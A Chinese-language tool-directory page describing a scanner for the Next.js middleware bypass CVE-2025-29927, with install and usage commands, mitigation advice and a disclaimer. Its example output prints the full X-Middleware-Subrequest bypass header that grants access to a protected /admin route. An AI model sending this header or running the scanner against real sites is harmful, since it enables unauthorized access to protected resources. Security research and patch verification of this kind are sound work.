Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-29927 — Next.js 中间件绕过扫描器 | Kitploit
工具/GitHubGitHub/gotr00t0day/cve-2025-29927
侦察漏洞扫描器Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubgotr00t0day/cve-2025-29927

CVE-2025-29927

Next.js 中间件绕过扫描器

查看仓库
8111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-29927

Next.js 中间件绕过扫描器 (CVE-2025-29927)

CVE-2025-29927 是一款专门用于检测 Next.js 中间件绕过漏洞 (CVE-2025-29927) 的安全工具,该漏洞影响 Next.js 版本 11.1.4 至 15.2.2。这一严重漏洞允许攻击者通过发送特制的 HTTP 头来绕过安全控制。

关于漏洞

Next.js 中间件绕过漏洞 (CVE-2025-29927) 允许攻击者通过发送恶意 X-Middleware-Subrequest 头来绕过授权控制,该头会混淆中间件处理逻辑。这可能导致对受保护资源和路由的未授权访问。

CVSS 评分: 9.1(严重)

功能特性

  • 快速并发扫描多个目标
  • 可选的 SSL 证书验证绕过(适用于基于 IP 的扫描)
  • 静默模式,便于自动化及聚焦输出
  • 详细的漏洞信息(状态码、绕过头)
  • 端点发现,实现全面测试

安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927

# 安装依赖
pip install -r requirements.txt

使用

root@kitploit:~
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]

命令行参数

  • -t, --target:要扫描的单个目标(例如 example.com 或 https://example.com)
  • -f, --file:包含目标列表的文件(每行一个)
  • -c, --concurrency:并发扫描数(默认:5)
  • -k, --insecure:禁用 SSL 证书验证(对 IP 地址有用)
  • -s, --silent:静默模式 - 仅显示存在漏洞的目标

示例

扫描单个目标:

root@kitploit:~
python CVE-2025-29927.py -t example.com

从文件扫描多个目标:

root@kitploit:~
python CVE-2025-29927.py -f targets.txt

禁用 SSL 验证的扫描:

root@kitploit:~
python CVE-2025-29927.py -t 192.168.1.1 -k

使用静默模式的自动化扫描:

root@kitploit:~
python CVE-2025-29927.py -f targets.txt -k -s

使用自定义头进行扫描:

root@kitploit:~
python3 CVE-2025-29927.py -t target -k -s -H "middleware"

输出

对于存在漏洞的目标,MiddleWay 会显示:

  • 易受攻击的端点
  • 原始状态码
  • 绕过后的状态码
  • 成功利用所使用的绕过头

输出示例:

root@kitploit:~
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
  Original status: 401
  Bypassed status: 200
  Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

缓解措施

要缓解此漏洞,请:

  1. 升级到 Next.js 14.2.25、15.2.3 或更高版本
  2. 如果无法升级,请在 WAF 或服务器层面阻止 X-Middleware-Subrequest 头

免责声明

此工具仅用于安全研究和防御目的。在扫描任何非您拥有的系统之前,请务必获得适当授权。作者不对任何误用此工具的行为负责。

许可证

MIT

下载工具